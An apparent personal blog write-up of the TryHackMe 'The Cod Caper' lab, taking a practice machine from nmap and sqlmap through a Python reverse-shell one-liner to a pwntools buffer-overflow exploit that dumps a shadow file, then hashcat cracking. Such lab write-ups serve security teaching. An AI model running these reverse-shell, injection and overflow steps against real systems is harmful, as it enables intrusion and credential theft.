<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="The Cod Caper TryHackMe" /><meta name="author" content="iamiqbal" /><meta property="og:locale" content="en" /><meta name="description" content="Hey there! This is my first writeup in which I’ll be walking you through infiltrating and exploiting a Linux system. This writeup will be a bit longer as it covers binary exploitation as well." /><meta property="og:description" content="Hey there! This is my first writeup in which I’ll be walking you through infiltrating and exploiting a Linux system. This writeup will be a bit longer as it covers binary exploitation as well." /><link rel="canonical" href="https://iamiqbal.github.io//posts/The-Cod-Caper/" /><meta property="og:url" content="https://iamiqbal.github.io//posts/The-Cod-Caper/" /><meta property="og:site_name" content="Muhammad Iqbal" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-08-04T16:00:00+05:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="The Cod Caper TryHackMe" /><meta name="twitter:site" content="@mib47225" /><meta name="twitter:creator" content="@iamiqbal" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"iamiqbal"},"dateModified":"2025-08-01T16:22:50+05:00","datePublished":"2022-08-04T16:00:00+05:00","description":"Hey there! This is my first writeup in which I’ll be walking you through infiltrating and exploiting a Linux system. This writeup will be a bit longer as it covers binary exploitation as well.","headline":"The Cod Caper TryHackMe","mainEntityOfPage":{"@type":"WebPage","@id":"https://iamiqbal.github.io//posts/The-Cod-Caper/"},"url":"https://iamiqbal.github.io//posts/The-Cod-Caper/"}</script><title>The Cod Caper | TryHackMe | Muhammad Iqbal</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Muhammad Iqbal"><meta name="application-name" content="Muhammad Iqbal"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="/assets/img/avatar/avatar.jpeg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Muhammad Iqbal</a></div><div class="site-subtitle font-italic">Rocats 🚀🐈</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/IAMIQBAL" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/mib47225" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['example','doamin.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>The Cod Caper | TryHackMe</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>The Cod Caper | TryHackMe</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1659610800" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Aug 4, 2022 </em> </span> <span> Updated <em class="" data-ts="1754047370" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Aug 1, 2025 </em> </span><div class="d-flex justify-content-between"> <span> By <em> Muhammad Iqbal </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1600 words"> <em>8 min</em> read</span></div></div></div><div class="post-content"><p>Hey there! This is my first writeup in which I’ll be walking you through infiltrating and exploiting a Linux system. This writeup will be a bit longer as it covers binary exploitation as well.</p><h2 id="task-1-intro"><span class="mr-2">Task 1: <strong>Intro</strong></span><a href="#task-1-intro" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><hr /><blockquote><p>Note: This room expects some basic pen testing knowledge, as I will not be going over every tool in detail that is used. While you can just use the room to follow through, some interest or experiencing in assembly is highly recommended</p></blockquote><h2 id="task-2-host-enumeration"><span class="mr-2">Task 2: <strong>Host Enumeration</strong></span><a href="#task-2-host-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><hr /><p>I’ll use <strong>nmap</strong> for scanning the host for open ports and services running on these ports.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="o">[</span>Target IP]

Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2022-08-04 15:22 EDT
Nmap scan report <span class="k">for</span> &lt;IP&gt;
Host is up <span class="o">(</span>0.52s latency<span class="o">)</span><span class="nb">.</span>
Not shown: &lt;N&gt; closed tcp ports <span class="o">(</span>conn-refused<span class="o">)</span>
PORT   STATE SERVICE VERSION
&lt;Redacted&gt;
</pre></table></code></div></div><h2 id="task-3-web-enumeration"><span class="mr-2">Task 3: <strong>Web Enumeration</strong></span><a href="#task-3-web-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><hr /><p>Now that we know what ports are open, we can further enumerate and use <strong>dirbuster</strong> for directory busting. We are already provided the wordlist big.txt</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>dibuster&amp;
</pre></table></code></div></div><p><img data-src="/assets/img/THM/The_Cod_Caper/1.png" alt="dirbuster" data-proofer-ignore></p><p>dirbuster has returned the name of the important file on the server.</p><h2 id="task-4-web-exploitation"><span class="mr-2">Task 4: <strong>Web Exploitation</strong></span><a href="#task-4-web-exploitation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><hr /><p>Once we visit the page that we got through directory busting, we see that it is a login form.</p><p><img data-src="/assets/img/THM/The_Cod_Caper/2.png" alt="login form" data-proofer-ignore></p><p>We can use burpsuite but we are not provided any wordlist for doing a bruteforce attack. Instead we can check for possible sql injection which will output the username and password for us to login.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>sqlmap <span class="nt">-u</span> http://[IP]/[Login Page] <span class="nt">--forms</span> <span class="nt">--dump</span>
</pre></table></code></div></div><p>Let sqlmap do its job. Once it is done you can answer questions of this task.</p><h2 id="task-5-command-execution"><span class="mr-2">Task 5: <strong>Command Execution</strong></span><a href="#task-5-command-execution" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><hr /><p>When we login, we are presented with a text box. In this text box we can enter commands and it’ll execute it for us and show us the output.</p><p>For example running <code class="language-plaintext highlighter-rouge">whoami</code> gives us the following output: <img data-src="/assets/img/THM/The_Cod_Caper/3.png" alt="whoami" data-proofer-ignore></p><p>If we can run <code class="language-plaintext highlighter-rouge">whoami</code>, we can get a reverse shell as well. SMART Right! Let’s do this.</p><p>Copy the following python code and paste it in the text box. REMEMBER to change the IP to your IP address.</p><p><code class="language-plaintext highlighter-rouge">python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'</code></p><p>Also listen for incoming connections through netcat before executing the command pasted inside text box.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nc <span class="nt">-lvnp</span> 4242
</pre></table></code></div></div><p>This should give you a reverse shell</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>nc <span class="nt">-lvnp</span> 5555             
listening on <span class="o">[</span>any] 5555 ...
connect to <span class="o">[</span>10.0.0.1] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.154.134] 34572
<span class="nv">$ </span><span class="nb">whoami
whoami
</span>www-data
<span class="nv">$ </span>
</pre></table></code></div></div><p>We got a reverse shell, What’s next? Well… We have to switch to <strong>pingu’s</strong> account but how?</p><p><strong>SSH</strong> to the rescue!</p><p>When we were doing host enumeration, we found out that port 22 is open as well. So we can ssh, but we don’t know the password for pingu’s account. We can do a quick linpeas and find any interesting files that can contain possible ssh passwords or we can find file that are owned by current user. I’ll go with the second method.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span>find / <span class="nt">-user</span> <span class="s2">"www-data"</span> <span class="nt">-name</span> <span class="s2">"*"</span> 2&gt; /dev/null
</pre></table></code></div></div><p>We ran find with user <strong>www-data</strong> which is the current user and we get all the files owned by this user. See anything Interesting? Any <strong>hidden password file</strong>?</p><blockquote><p>Hint: /var/*</p></blockquote><p>Open this file and it contains the ssh password. Simply Do:</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="nv">$ </span>su pingu
su pingu
Password: &lt;Redacted&gt;

To run a <span class="nb">command </span>as administrator <span class="o">(</span>user <span class="s2">"root"</span><span class="o">)</span>, use <span class="s2">"sudo &lt;command&gt;"</span><span class="nb">.</span>
See <span class="s2">"man sudo_root"</span> <span class="k">for </span>details.

pingu@ubuntu:/tmp<span class="nv">$ </span>
</pre></table></code></div></div><p>And we have switched to pingu’s account!</p><h2 id="task-6-linenumlinpeas"><span class="mr-2">Task 6: <strong>LinEnum/Linpeas</strong></span><a href="#task-6-linenumlinpeas" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>What NOW? We need to get root access to recover pingu’s chest Right!</p><p>At this point we can automate the process and let linpeas find Interesting files for us. But I am gonna check files that have SUID bit set manually by using this command:</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span>find / <span class="nt">-perm</span> <span class="nt">-04000</span> 2&gt; /dev/null
</pre></table></code></div></div><p>This returns several files but one file catches my attention.</p><blockquote><p>Hint: /opt/*</p></blockquote><h2 id="task-78-and-9-pwndbg"><span class="mr-2">Task 7,8 and 9: <strong>pwndbg</strong></span><a href="#task-78-and-9-pwndbg" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>From previous task we got a binary named <strong>root</strong>. The source code of the binary is given in the room as well.</p><div class="language-c highlighter-rouge"><div class="code-header"> <span data-label-text="C"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre><span class="cp">#include</span> <span class="cpf">"unistd.h"</span><span class="cp">
#include</span> <span class="cpf">"stdio.h"</span><span class="cp">
#include</span> <span class="cpf">"stdlib.h"</span><span class="cp">
</span><span class="kt">void</span> <span class="nf">shell</span><span class="p">(){</span>
<span class="n">setuid</span><span class="p">(</span><span class="mi">1000</span><span class="p">);</span>
<span class="n">setgid</span><span class="p">(</span><span class="mi">1000</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="s">"cat /var/backups/shadow.bak"</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">get_input</span><span class="p">(){</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="n">scanf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span><span class="n">buffer</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(){</span>
<span class="n">get_input</span><span class="p">();</span>
<span class="p">}</span>
</pre></table></code></div></div><p>When we inspect the source code, we can see that buffer can take no more than 32 characters. It is vulnerable to buffer overflow. and we can also see that <code class="language-plaintext highlighter-rouge">shell()</code> funcion which outputs the shadow backup file which contains the hashes for accounts on a system. We are interested in the hash of <strong>root</strong> account. <code class="language-plaintext highlighter-rouge">main()</code> function does not call <code class="language-plaintext highlighter-rouge">shell()</code> but if we overflow the buffer variable and control the EIP registed and concatenate the address of the <code class="language-plaintext highlighter-rouge">shell()</code> then it will get executed and print the shadow file. So let’s do this step by step:</p><ol><li>Let’s do a quick file type check<div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>pingu@ubuntu:/opt/secret<span class="nv">$ </span>file root
root: setuid ELF 32-bit LSB executable, Intel 80386, version 1 <span class="o">(</span>SYSV<span class="o">)</span>, dynamically linked, interpreter /lib/ld-linux.so.2, <span class="k">for </span>GNU/Linux 2.6.32, BuildID[sha1]<span class="o">=</span>af41c72a4c8f1a4d720315cdafa47536e92657b2, not stripped
</pre></table></code></div></div><p>   We are dealing with a x86 architecture binary</p><li>Before we go any further, do a checksec as well to check the properties of the executable.</ol><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>pingu@ubuntu:/opt/secret<span class="nv">$ </span>checksec root

<span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="s1">'/opt/secret/root'</span>
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE <span class="o">(</span>0x8048000<span class="o">)</span>
    RWX:      Has RWX segments
</pre></table></code></div></div><p>   No Canary, NX disabled and No PIE in this case.</p><p>But what are these? Let me quote the definitions below:</p><h3 id="stack-canaries"><span class="mr-2">Stack Canaries</span><a href="#stack-canaries" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><hr /><blockquote><p>Stack Canaries are tokens placed after a stack to detect a stack overflow. On a less morbid note, stack canaries sit beside the stack in memory (where the program variables are stored), and if there is a stack overflow, then the canary will be corrupted. This allows the program to detect a buffer overflow and shut down.</p></blockquote><h3 id="nx"><span class="mr-2">NX</span><a href="#nx" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><hr /><blockquote><p>NX is short for non-executable. If this is enabled, then memory segments can be either writable or executable, but not both. This stops potential attackers from injecting their own malicious code (called shellcode) into the program, because something in a writable segment cannot be executed.  On the vulnerable binary, you may have noticed the extra line RWX that indicates that there are segments which can be read, written, and executed.</p></blockquote><h2 id="pie"><span class="mr-2">PIE</span><a href="#pie" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><hr /><blockquote><p>PIE stands for Position Independent Executable. This loads the program dependencies into random locations, so attacks that rely on memory layout are more difficult to conduct.</p></blockquote><p>Now that you know what Stack Canary, NX and PIE is! Let’s continue where we left.</p><ol><li>We’ll run the binary and input character less than length 32 (Remember the buffer size!). It’ll exit normally.<div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>pingu@ubuntu:/opt/secret<span class="nv">$ </span>./root
abc
</pre></table></code></div></div></ol><p>   But when we enter more than 32 character it shows us <strong>Segmentation Fault</strong></p><ol><li>Let’s investigate further but opening the binary in pwndbg, and run it with more than 32 characters input. It’ll show us the registers that were overwritten by extra inputs.</ol><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>pingu@ubuntu:/opt/secret<span class="nv">$ </span>gdb root
pwndbg&gt; run &lt; &lt;<span class="o">(</span>cyclic 50<span class="o">)</span>
</pre></table></code></div></div><p>   Here is the output.</p><p><img data-src="/assets/img/THM/The_Cod_Caper/4.png" alt="pwn" data-proofer-ignore></p><p>   The output shows that EIP is overwritten. EIP or Extended Instruction Pointer is a register which carries the address of the next instruction that is to be executed. In this case we have overwritten EIP with 4 bytes generated from cyclic. If instead of ‘laaa’ we provide the address of that command which will point to shell function then we can run shell function too.</p><ol><li>We need to find out how many bytes we have to write before overwriting the EIP, because we want to give EIP our desired address. Using <code class="language-plaintext highlighter-rouge">cyclic -l [address where error occurred]</code> we can find out that.</ol><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>pwndbg&gt; cyclic <span class="nt">-l</span> 0x6161616c
44
</pre></table></code></div></div><p>   44 bytes in this case.</p><ol><li>Everything is set. The only thing we need to find out is which function will execute shell in the binary and the address of that function. There are several way.</ol><p>      <strong>Method 1:</strong></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>pwndbg&gt; info functions
</pre></table></code></div></div><p>      This will output all the functions in the binary. and we can see that shell has address <code class="language-plaintext highlighter-rouge">0x080484cb</code></p><p><img data-src="/assets/img/THM/The_Cod_Caper/5.png" alt="M1" data-proofer-ignore></p><p>      <strong>Method 2:</strong></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>pwndbg&gt; print&amp; shell
</pre></table></code></div></div><p>      This will print the address of only <code class="language-plaintext highlighter-rouge">shell</code> function.</p><p><img data-src="/assets/img/THM/The_Cod_Caper/6.png" alt="M2" data-proofer-ignore></p><p>      <strong>Method 3:</strong></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>pwndbg&gt; disassemble shell
</pre></table></code></div></div><p>      This will show the inner workings of shell function and our address of interest is again <code class="language-plaintext highlighter-rouge">0x080484cb</code></p><ol><li>Now that we know the address of the shell function and how many bytes we need before we overwrite EIP, The last piece is to write a python script to run the shell function.</ol><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>from pwn import *

padding = cyclic(cyclic_find('laaa'))
eip = p32(0x080484cb)
payload = padding + eip

print(payload)
</pre></table></code></div></div><p>   The first line imports the pwntools library. On third line <code class="language-plaintext highlighter-rouge">cyclic_find</code> finds where the pattern <code class="language-plaintext highlighter-rouge">laaa</code> has occured in the <code class="language-plaintext highlighter-rouge">pwn cyclic 50</code> output and returns its position index which is 44 and passes to <code class="language-plaintext highlighter-rouge">cyclic</code> which outputs 44 characters. The fourth line packs our address of <code class="language-plaintext highlighter-rouge">shell</code> function into little endian output. Then on 5th line we concatenate both padding and eip into payload variable and print the output.</p><ol><li>We run this python script and pass the output into a file and pass that file to our binary input.</ol><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>pingu@ubuntu:/opt/secret<span class="nv">$ </span>python2.7 exploit.py <span class="o">&gt;</span> attack
pingu@ubuntu:/opt/secret<span class="nv">$ </span>./root &lt; attack
</pre></table></code></div></div><p>   This will output the contents of <code class="language-plaintext highlighter-rouge">/var/backups/shadow.bak</code> file which contains the hash of root as well.</p><h2 id="task-10-finishing-the-job"><span class="mr-2">Task 10: <strong>Finishing the Job</strong></span><a href="#task-10-finishing-the-job" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Now that we have the hash of root, we can run hashcat and recover the password.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>hashcat <span class="nt">-a</span> 0 <span class="nt">-m</span> 1800 <span class="o">[</span>hashroot] /usr/share/wordlists/rockyou.txt
